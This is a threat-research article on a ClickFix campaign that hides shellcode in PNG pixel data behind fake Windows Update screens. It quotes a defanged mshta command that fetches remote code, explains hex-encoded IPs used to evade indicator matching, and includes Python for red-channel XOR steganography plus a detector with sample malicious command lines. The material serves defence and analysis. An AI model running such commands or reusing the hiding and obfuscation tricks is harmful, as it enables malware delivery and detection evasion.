Cybersecurity researchers at Huntress have uncovered a sophisticated ClickFix campaign that leverages steganography to conceal malicious code within PNG images disguised as Windows Update screens.
The attack chain delivers multiple variants of information-stealing malware, including LummaC2 and Rhadamanthys, through a deceptive social engineering technique that tricks users into executing commands via the Windows Run prompt.
ClickFix represents a growing threat vector in the cybercriminal arsenal, exploiting user trust in familiar Windows interface elements.
The campaign begins with convincing fake Windows Update screens that display realistic “Working on updates” animations in full-screen mode.
Once the phony update completes, users are prompted to follow a simple but malicious instruction: open the Run prompt using Win+R, then paste and execute a pre-copied command using Ctrl+V.
The attack unfolds across five distinct stages, each layer adding obfuscation to evade detection.
The initial stage employs mshta.exe to execute JScript code that downloads a PowerShell loader from a remote server.
This second stage contains extensive junk code designed to confuse automated analysis, but beneath the noise lies a dynamically decrypted .NET assembly that establishes the foundation for the attack’s most innovative component.
The third stage introduces the steganographic loader, a .NET assembly that extracts shellcode hidden within encrypted PNG image files.
Rather than appending malicious data to files, attackers encode executable code directly into the pixel data of PNG images using specific color channels.
The command the lure page places on the clipboard is itself not obfuscated; in plaintext it reads mshta hXXp://81.0x5a.29[.]64/ebc/rps.gz (note the hex-encoded second octet: 0x5a is 90, so the host is 81.90.29.64).
The custom steganography algorithm targets the red channel of BGRA pixel data, extracting shellcode by XORing calculated values with the red channel bytes.
This approach represents a significant technical evolution in malware delivery. By embedding payload data within legitimate-appearing image files, attackers bypass traditional file signature detection and complicate forensic analysis.
The shellcode extraction process involves accessing the bitmap’s raw pixel data through system memory, calculating stride offsets to account for row padding, and reconstructing the encrypted payload byte-by-byte from individual color channels.
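The following Python is an added illustration of the extraction technique described above; it is not Huntress's code and not the loader's actual algorithm. It walks a raw BGR/BGRA pixel buffer by stride (as System.Drawing's LockBits exposes it), pulls the red byte of each pixel, and XORs it with a keystream. The keystream, the 4-byte length header, and the image dimensions are assumptions made for the demo; the article only states that the loader XORs "calculated values" against the red channel bytes.

```python
import struct

RED_OFFSET = 2  # in BGR / BGRA byte order each pixel is [B, G, R(, A)]; red is the third byte


def row_stride(width: int, bytes_per_pixel: int) -> int:
    """Row stride as GDI+ (System.Drawing Bitmap.LockBits) reports it: rows are padded
    to a 4-byte boundary. For 32bpp BGRA this equals width*4; for 24bpp BGR it includes
    0-3 padding bytes per row, which is why a loader must step by stride, not width*bpp."""
    return (width * bytes_per_pixel + 3) & ~3


def keystream(length: int, seed: int) -> bytes:
    """Hypothetical stand-in for the loader's 'calculated values'. The real derivation
    is not disclosed in the article; any position-dependent byte sequence serves here."""
    return bytes(((seed + 7 * i) ^ (i >> 3)) & 0xFF for i in range(length))


def embed_in_red(payload: bytes, width: int, height: int, bytes_per_pixel: int, seed: int) -> bytes:
    """Constructed fixture: a flat grey image whose red channel carries a 4-byte little-endian
    length header followed by payload XOR keystream. Blue/green/alpha stay untouched, so the
    picture still renders as an ordinary image. (The header layout is an assumption for the demo.)"""
    stride = row_stride(width, bytes_per_pixel)
    data = struct.pack("<I", len(payload)) + payload
    if len(data) > width * height:
        raise ValueError(f"{len(data)} hidden bytes need {len(data)} pixels, image has {width * height}")
    ks = keystream(len(data), seed)
    buf = bytearray(b"\x80" * (stride * height))
    for i, b in enumerate(data):
        y, x = divmod(i, width)                       # one hidden byte per pixel, row-major
        buf[y * stride + x * bytes_per_pixel + RED_OFFSET] = b ^ ks[i]
    return bytes(buf)


def extract_from_red(buf: bytes, width: int, height: int, stride: int,
                     bytes_per_pixel: int, seed: int) -> bytes:
    """Mirror of the stego loader: walk the locked pixel buffer by stride, read the red byte
    of each pixel, and XOR it with the computed keystream to rebuild the hidden bytes."""
    def red_bytes(count: int) -> bytes:
        out = bytearray()
        for i in range(count):
            y, x = divmod(i, width)
            if y >= height:
                raise ValueError("image too small for the requested byte count")
            out.append(buf[y * stride + x * bytes_per_pixel + RED_OFFSET])
        return bytes(out)

    header = bytes(a ^ b for a, b in zip(red_bytes(4), keystream(4, seed)))
    total = 4 + struct.unpack("<I", header)[0]
    raw = red_bytes(total)
    ks = keystream(total, seed)
    return bytes(a ^ b for a, b in zip(raw[4:], ks[4:]))


def roundtrip(payload: bytes, width: int = 17, height: int = 5,
              bytes_per_pixel: int = 3, seed: int = 0x5A) -> bytes:
    """Hide payload in a 17x5 24bpp image (51-byte rows padded to 52) and recover it."""
    buf = embed_in_red(payload, width, height, bytes_per_pixel, seed)
    return extract_from_red(buf, width, height, row_stride(width, bytes_per_pixel),
                            bytes_per_pixel, seed)


if __name__ == "__main__":
    sample = b"\x90\x90\x90\x90CONSTRUCTED-DEMO-PAYLOAD-NOT-REAL"  # constructed placeholder bytes
    assert roundtrip(sample) == sample
    print("stride for a 17px-wide 24bpp row:", row_stride(17, 3))
```

The 24bpp case is chosen deliberately: a 17-pixel row is 51 bytes but is stored as 52, so an extractor that steps by width*bpp instead of the reported stride reads green and blue bytes from the second row onward and recovers garbage. For a forensic analyst the same walk, run against a captured PNG with the real key derivation recovered from the .NET assembly, yields the Donut-packed shellcode the article describes.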
Donut-Packed Final Payload
Once extracted, the shellcode is injected into the explorer.exe process through a fourth-stage .NET assembly that performs standard process injection techniques.
This stage dynamically compiles C# source code at runtime, allocates executable memory within the target process, and creates a remote thread to execute the injected payload.
The final stage shellcode is packed using Donut, a legitimate shellcode packer frequently abused by threat actors. Analysis reveals the unpacked final payload to be either LummaC2 or Rhadamanthys stealer, depending on campaign variant.
Since early October 2025, Huntress has tracked multiple attack clusters associated with the IP address 141.98.80.175, which hosted both the initial MSHTA stages and the PowerShell loaders.
Notably, the threat actor writes IP octets in hexadecimal in the mshta commands (the host appears as 141.0x62.80.175, where 0x62 is 98) so that a literal string match on 141.98.80.175 fails, even though Windows resolves both forms to the same address.
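As an added example, not taken from Huntress or the article, the Python below canonicalises numeric hosts the way inet_addr()-style parsers do (0x prefix is hex, a leading 0 is octal, fewer than four parts means the last part fills the remaining bytes) before matching them against an IOC list, so the 141.0x62.80.175 spelling still matches 141.98.80.175. The two hosts and the /ebc/rps.gz path are the ones quoted in the article; every other command line and path in the sample set is constructed for the demo.

```python
import re
from typing import Optional

# Canonical IOC for the cluster the article describes.
KNOWN_BAD = {"141.98.80.175"}

# mshta followed by an http(s) or defanged hxxp(s) URL; group 1 is the host (and optional :port).
MSHTA_URL_RE = re.compile(r"\bmshta(?:\.exe)?\s+[\"']?h(?:tt|xx)ps?://([^/\s\"']+)", re.IGNORECASE)


def _parse_part(part: str) -> int:
    """One dotted component under inet_addr() rules: 0x prefix = hex, leading 0 = octal, else decimal."""
    if not part.isalnum():
        raise ValueError(part)          # rejects '', '-1', '1_0' and whitespace
    if part[:2].lower() == "0x":
        return int(part[2:], 16)        # int('', 16) raises for a bare '0x'
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def normalize_ipv4(host: str) -> Optional[str]:
    """Return dotted-decimal for any numeric host inet_addr() would accept, else None.
    With fewer than four parts the last part fills the remaining low bytes (a.b.c, a.b, a)."""
    parts = host.replace("[.]", ".").split(".")   # also accept defanged IOC spelling
    if not 1 <= len(parts) <= 4:
        return None
    try:
        vals = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    tail_bytes = 5 - len(vals)          # 4 parts -> 1 byte, 3 -> 2, 2 -> 3, 1 -> 4
    if any(v > 255 for v in vals[:-1]) or vals[-1] >> (8 * tail_bytes):
        return None
    value = 0
    for v in vals[:-1]:
        value = (value << 8) | v
    value = (value << (8 * tail_bytes)) | vals[-1]
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def check_command_line(cmdline: str) -> Optional[dict]:
    """Flag an mshta command line whose URL host is a numeric IP, canonicalising it so an IOC
    match works regardless of hex, octal or short-form encoding. None if no mshta URL present."""
    m = MSHTA_URL_RE.search(cmdline)
    if not m:
        return None
    host = m.group(1).split(":")[0]     # drop an explicit port
    canonical = normalize_ipv4(host)
    return {
        "raw_host": host,
        "canonical": canonical,
        "encoded": canonical is not None and canonical != host.replace("[.]", "."),
        "known_bad": canonical in KNOWN_BAD,
    }


# Constructed process command lines for the demo (hosts on the first two lines are from the article).
SAMPLE_CMDLINES = [
    "mshta http://141.0x62.80.175/stage1",            # hex second octet (path constructed)
    "mshta hXXp://81.0x5a.29[.]64/ebc/rps.gz",         # defanged, as printed in the article
    'mshta.exe "http://141.98.20655/x"',               # 3-part form: 20655 = 80*256 + 175
    "mshta http://0x8d6250af/x",                       # whole address as one hex integer
    "mshta http://141.0142.80.175/x",                  # octal second octet (0142 = 98)
    "mshta https://example.com/page.hta",              # hostname, not an IP literal
    "powershell -nop -w hidden -c Get-Date",           # no mshta URL at all
]


def scan(cmdlines) -> list:
    """Return (raw_host, canonical) for every mshta command whose canonical host is in KNOWN_BAD."""
    hits = []
    for line in cmdlines:
        r = check_command_line(line)
        if r and r["known_bad"]:
            hits.append((r["raw_host"], r["canonical"]))
    return hits


if __name__ == "__main__":
    for raw, canon in scan(SAMPLE_CMDLINES):
        print(f"IOC hit: {raw} -> {canon}")
```

Run this over process-creation telemetry (Sysmon Event ID 1 or EDR process events) rather than over URL fields alone: the ClickFix chain launches mshta.exe from the Run prompt, so a parent of explorer.exe plus any numeric host in the mshta command line is itself worth an alert, with the canonical address used for the IOC lookup. The "encoded" flag is a useful secondary signal, since legitimate software rarely spells an IP address in hex or octal.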
The campaign continues despite November’s Operation Endgame law enforcement takedowns targeting Rhadamanthys infrastructure.
Organizations should prioritize user awareness training to identify ClickFix social engineering tactics.
Technical controls include disabling the Windows Run prompt (the Explorer NoRun policy) via the Registry or Group Policy, application control rules (AppLocker or WDAC) that block mshta.exe for standard users, and monitoring for suspicious .NET assembly loading patterns. Disabling Win+R alone is only a partial fix, because ClickFix lures can equally direct the victim to paste into the File Explorer address bar or a terminal; blocking mshta.exe and similar living-off-the-land binaries is the more durable control.
Endpoint detection and response solutions should focus on detecting dynamic code compilation and reflective assembly loading techniques.
The campaign demonstrates how steganography, multi-stage execution chains, and social engineering combine to create formidable threats that challenge traditional security defenses.
